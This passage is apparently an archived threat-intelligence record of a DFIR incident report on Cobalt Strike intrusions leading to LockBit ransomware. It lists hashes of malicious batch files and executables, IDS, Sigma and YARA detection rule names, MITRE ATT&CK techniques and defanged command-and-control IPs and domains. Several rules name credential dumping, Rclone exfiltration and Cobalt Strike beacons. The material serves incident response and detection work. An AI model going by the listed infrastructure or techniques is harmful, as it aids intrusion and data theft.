svcmcc.dll\r\n0aa05ebc3b6667954898cfccc4057600\r\nc59cbd309b3393cb08a1133364ed11000fdd418d\r\n44cf04192384e920215f0e335561076050129ad7a43b58b1319fa1f950f6a7b6\r\nFile: sd.exe\r\n2800a10c4afae44978d906b2abaed745\r\n84019de427aef1f1e4f32b579767bee6d0bd1e64\r\nc1173628f18f7430d792bbbefc6878bced4539c8080d518555d08683a3f1a835\r\nFile: SETUP.bat\r\nd9adb3dd6df169e824b2867a2b8cba89\r\nb077ea03b207cc8b8b48b9b4f9a58dabbd39f678\r\n7673a949181e33ff8ed77d992a2826c25b8da333f9e03213ae3a72bb4e9a705d\r\nFile: ds.exe\r\n71c8c1a0056fd084bc32a03d9245ad10\r\n5de1f72ffeea1ecbd287b0ca8ddb2c5264d9acb5\r\n59c9d10f06f8cb2049df39fb4870a81999fd3f8a79717df9b309fadeb5f26ef9\r\nFile: EXE1.bat\r\n573a213191985c555dd7e8de5f0a9cae\r\naa19a1648d680c3bfbee7dcc3df41ce98af8e121\r\nba9b879fdc304bd7f5554528fb8e858ef36ad4657fedfefb8495f43ce73fc6f1\r\nFile: EXE.bat\r\n4457256150386acec794e9e8ee412691\r\nc6d54322a17e754150e61f7caa91226a84b0b774\r\n10ce939e4ee8b5285d84c7d694481ebbdf986904938d07f7576d733e830ed012\r\nFile: COPY.bat\r\n6d44c5fb49258f285769e50830fc59af\r\nda6771fbbcfaf195b80925cefc880794d62d61bf\r\n3af3f2d08aa598ab4f448af1b01a5ad6c0f8e8982488ebf4e7ae7b166e027a8b\r\nFile: WMI.bat\r\n40852fde665eb9119fcc565bd68de680\r\n956e020206c4dc4240537d07be022e86ed918ed1\r\n578a2ac45e40a686a5f625bbc7873becd8eb9fe58ea07b1d318b93ee0d127d4e\r\nFile: RDP.bat\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 26 of 30\n\n996ad32c7ae2190b7fa7876df0d7b717\r\n4a1e667e0c3550f4446903570adbe7776699d4ca\r\n791157675ad77b0ae9feabd76f4b73754a7537b7a9a2cc74bd0924d65be680e1\r\nFile: WMI1.bat\r\n90f9044cfee2c678fe51abd098bdfe97\r\ne3619582f4d81ca180dee161bbe49d499b237119\r\nc4863cc28e01713e6a857b940873b0e5caedfd1fcb9b2a8d07ffb4c0c48379d5\r\nFile: COPY1.bat\r\nb254f8f03e61bd9469df66c189d79871\r\n45337ae989cd62d07059f867ce62ff6b6fc90819\r\n9bcaad9184b182965923a141f52fb75ddd1975b99ab080869896cee5879ecfad\r\nFile: DEF.bat\r\n4794accd22271a28547fb3613ee79218\r\nccc6b5bf9591fa9a3d57fd48ee0c9c49a6d22da9\r\n53828f56c6894a468a091c8858d2e29144b68d5de8ff1d69a567e97aac996026\r\nDetections\r\nNetwork\r\nET POLICY PsExec service created\r\nET RPC DCERPC SVCCTL - Remote Service Control Manager Access\r\nET POLICY SMB2 NT Create AndX Request For an Executable File\r\nET POLICY SMB Executable File Transfer\r\nET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement\r\nETPRO MALWARE Cobalt Strike Related Domain in DNS Lookup\r\nET POLICY Possible Powershell .ps1 Script Use Over SMB\r\nET POLICY PE EXE or DLL Windows file download HTTP\r\nETPRO MALWARE Unknown Golang Backdoor Activity\r\nETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1\r\nETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2\r\nETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2\r\nETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1\r\nET INFO Abused File Sharing Site Domain Observed (qaz .im) in TLS SNI\r\nSigma\r\nSearch rules on detection.fyi or sigmasearchengine.com\r\nDFIR Public Rules Repo:\r\ndee0aaa1-b7d7-4be0-ac30-2add7b88d259 : Operator Bring Your Own Tools\r\nDFIR Private Rules:\r\n1aafd4cc-cb38-498b-9365-394f71fd872c : Veeam Credential Dumping Script\r\nb878e8c2-bfa5-4b1d-8868-a798f57d197a : Veeam Credential Dumping Script Execution\r\nbaa9adf9-a01c-4c43-ac57-347b630bf69e : Default Cobalt Strike Named Pipes\r\n213d8255-f359-410b-ac27-e7e85c6394a8 : Suspicious Binaries in Public Folders\r\n6df37102-c993-4133-ad3d-b12ca32e03c6 : Detect Process Creation via WMIC with Remote Node\r\nSigma Repo:\r\n9f22ccd5-a435-453b-af96-bf99cbb594d4 : WinAPI Function Calls Via PowerShell Scripts\r\n19d65a1c-8540-4140-8062-8eb00db0bba5 : WinAPI Library Calls Via PowerShell Scripts\r\n1f49f2ab-26bc-48b3-96cc-dcffbc93eadf : Potential Suspicious PowerShell Keywords\r\ndf69cb1d-b891-4cd9-90c7-d617d90100ce : Suspicious FromBase64String Usage On Gzip Archive : Ps Script\r\n1ff315dc-2a3a-4b71-8dde-873818d25d39 : New BITS Job Created Via Bitsadmin\r\na762e74f-4dce-477c-b023-4ed81df600f9 : Scheduled Task Created : FileCreation\r\n93ff0ceb-e0ef-4586-8cd8-a6c277d738e3 : Scheduled Task Created : Registry\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 27 of 30\n\n87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 : Change PowerShell Policies to an Insecure Level\r\nf4bbd493-b796-416e-bbf2-121235348529 : Non Interactive PowerShell Process Spawned\r\n734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8 : Remote PowerShell Session Host Process (WinRM)\r\n8de1cbe8-d6f5-496d-8237-5f44a721c7a0 : Whoami.EXE Execution Anomaly\r\n502b42de-4306-40b4-9596-6f590c81f073 : Local Accounts Discovery\r\ne4a74e34-ecde-4aab-b2fb-9112dd01aed0 : Dynamic CSharp Compile Artefact\r\n61065c72-5d7d-44ef-bf41-6a36684b545f : Elevated System Shell Spawned\r\n0eb46774-f1ab-4a74-8238-1155855f2263 : Disable Windows Defender Functionalities Via Registry Keys\r\nfb843269-508c-4b76-8b8d-88679db22ce7 : Suspicious Execution of Powershell with Base64\r\n89ca78fd-b37c-4310-b3d3-81a023f83936 : Schtasks Creation Or Modification With SYSTEM Privileges\r\n3a6586ad-127a-4d3b-a677-1e6eacdf8fde : Windows Shell/Scripting Processes Spawning Suspicious Programs\r\n1f21ec3f-810d-4b0e-8045-322202e22b4b : Network Connection Initiated By PowerShell Process\r\n7cccd811-7ae9-4ebe-9afd-cb5c406b824b : Potential Execution of Sysinternals Tools\r\n0e7163d4-9e19-4fa7-9be6-000c61aad77a : CobaltStrike Named Pipe Pattern Regex\r\neeb2e3dc-c1f4-40dd-9bd5-149ee465ad50 : Remote Thread Creation Via PowerShell\r\nb5de0c9a-6f19-43e0-af4e-55ad01f550af : Unsigned DLL Loaded by Windows Utility\r\n9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c : DLL Load By System Process From Suspicious Locations\r\n61a7697c-cb79-42a8-a2ff-5f0cdfae0130 : Potential CobaltStrike Service Installations : Registry\r\ned74fe75-7594-4b4b-ae38-e38e3fd2eb23 : Outbound RDP Connections Over Non-Standard Tools\r\ncdc8da7d-c303-42f8-b08c-b4ab47230263 : Rundll32 Internet Connection\r\n1277f594-a7d1-4f28-a2d3-73af5cbeab43 : Windows Shell/Scripting Application File Write to Suspicious Folder\r\nbcb03938-9f8b-487d-8d86-e480691e1d71 : Network Connection Initiated From Users\\Public Folder\r\ne37db05d-d1f9-49c8-b464-cee1a4b11638 : PUA : Rclone Execution\r\n02ee49e2-e294-4d0f-9278-f5b3212fc588 : New RUN Key Pointing to Suspicious Folder\r\n20f0ee37-5942-4e45-b7d5-c5b5db9df5cd : CurrentVersion Autorun Keys Modification\r\n69bd9b97-2be2-41b6-9816-fb08757a4d1a : Potentially Suspicious Execution From Parent Process In Public Folder\r\nfff9d2b7-e11c-4a69-93d3-40ef66189767 : Suspicious Copy From or To System Directory\r\n259e5a6a-b8d2-4c38-86e2-26c5e651361d : PsExec Service File Creation\r\n2ddef153-167b-4e89-86b6-757a9e65dcac : File Download Via Bitsadmin To A Suspicious Target Folder\r\nd21374ff-f574-44a7-9998-4a8c8bf33d7d : WmiPrvSE Spawned A Process\r\nd059842b-6b9d-4ed1-b5c3-5b89143c6ede : File Download Via Bitsadmin\r\nfa34b441-961a-42fa-a100-ecc28c886725 : LSASS Access From Program In Potentially Suspicious Folder\r\n5ef9853e-4d0e-4a70-846f-a9ca37d876da : Potential Credential Dumping Activity Via LSASS\r\n4f86b304-3e02-40e3-aa5d-e88a167c9617 : Scheduled Task Deletion\r\n36210e0d-5b19-485d-a087-c096088885f0 : Suspicious PowerShell Parameter Substring\r\n5cc90652-4cbd-4241-aa3b-4b462fa5a248 : Potential Recon Activity Via Nltest.EXE\r\n526be59f-a573-4eea-b5f7-f0973207634d : New Process Created Via Wmic.EXE\r\n602a1f13-c640-4d73-b053-be9a2fa58b96 : HackTool : Powerup Write Hijack DLL\r\n37ae075c-271b-459b-8d7b-55ad5f993dd8 : File or Folder Permissions Modifications\r\n178e615d-e666-498b-9630-9ed3630381 : Elevated System Shell Spawned From Uncommon Parent Location\r\ne6e88853-5f20-4c4a-8d26-cd469fd8d31f : Ntdsutil Abuse\r\nYara\r\nELASTIC_Windows_Ransomware_Lockbit_369E1E94\r\nMALPEDIA_Win_Lockbit_Auto\r\nMAL_RANSOM_LockBit_Apr23_1\r\nMAL_RANSOM_LockBit_ForensicArtifacts_Apr23_1\r\nSIGNATURE_BASE_MAL_RANSOM_Lockbit_Apr23_1\r\nSIGNATURE_BASE_MAL_RANSOM_Lockbit_Forensicartifacts_Apr23_1\r\nCobaltStrike_Resources_Httpsstager_Bin_v2_5_through_v4_x\r\nCobaltStrike_Resources_Xor_Bin_v2_x_to_v4_x\r\nCobaltStrike_Sleep_Decoder_Indicator\r\nCobaltbaltstrike_Beacon_XORed_x86\r\nCobaltbaltstrike_RAW_Payload_https_stager_x86\r\nHKTL_CobaltStrike_Beacon_4_2_Decrypt\r\nHKTL_CobaltStrike_Beacon_Strings\r\nHKTL_CobaltStrike_SleepMask_Jul22\r\nHKTL_Win_CobaltStrike\r\nSUSP_PS1_JAB_Pattern_Jun22_1\r\nWiltedTulip_WindowsTask\r\nWindows_Shellcode_Generic_8c487e57\r\nWindows_Trojan_CobaltStrike_3dc22d14\r\nWindows_Trojan_CobaltStrike_8d5963a2\r\nWindows_Trojan_CobaltStrike_b54b94ac\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 28 of 30\n\nWindows_Trojan_Metasploit_24338919\r\nWindows_Trojan_Metasploit_38b8ceec\r\nWindows_Trojan_Metasploit_7bc0f998\r\nWindows_Trojan_Metasploit_c9773203\r\nMITRE ATT\u0026CK\r\nCredentials In Files - T1552.001\r\nData Encrypted for Impact - T1486\r\nDisable or Modify Tools - T1562.001\r\nDomain Account - T1087.002\r\nDomain Groups - T1069.002\r\nDomain Trust Discovery - T1482\r\nExfiltration Over Alternative Protocol - T1048\r\nExfiltration to Cloud Storage - T1567.002\r\nGroup Policy Discovery - T1615\r\nLSASS Memory - T1003.001\r\nMalicious File - T1204.002\r\nMasquerading - T1036\r\nMatch Legitimate Name or Location - T1036.005\r\nNTDS - T1003.003\r\nPowerShell - T1059.001\r\nProcess Discovery - T1057\r\nProcess Injection - T1055\r\nProxy - T1090\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 29 of 30\n\nRegistry Run Keys / Startup Folder - T1547.001\r\nRemote Desktop Protocol - T1021.001\r\nRemote System Discovery - T1018\r\nScheduled Task - T1053.005\r\nService Execution - T1569.002\r\nSMB/Windows Admin Shares - T1021.002\r\nWeb Protocols - T1071.001\r\nWindows Command Shell - T1059.003\r\nWindows Management Instrumentation - T1047\r\nWindows Remote Management - T1028\r\nInternal case #TB27138 #PR34378\r\nSource: https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nhttps://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\r\nPage 30 of 30\n\nsetup_wm.exe. IP Port Domain Ja3 Ja3s\n31.172.83.162 443 compdatasystems[.]com a0e9f5d64349fb13191bc781f81f42e1 8ed408107f89c53261bf74e58517bc\n31.172.83.162 443 user.compdatasystems[.]com a0e9f5d64349fb13191bc781f81f42e1 8ed408107f89c53261bf74e58517bc\n159.100.14.254 443 retailadvertisingservices[.]com a0e9f5d64349fb13191bc781f81f42e1 303951d4c50efb2e991652225a6f02\n  Page 15 of 30",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/"
	],
	"report_names": [
		"cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434204,
	"ts_updated_at": 1775826692,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/48b8addb3e40a7f846774985d88c3e591b143efa.pdf",
		"text": "https://archive.orkl.eu/48b8addb3e40a7f846774985d88c3e591b143efa.txt",
		"img": "https://archive.orkl.eu/48b8addb3e40a7f846774985d88c3e591b143efa.jpg"
	}
}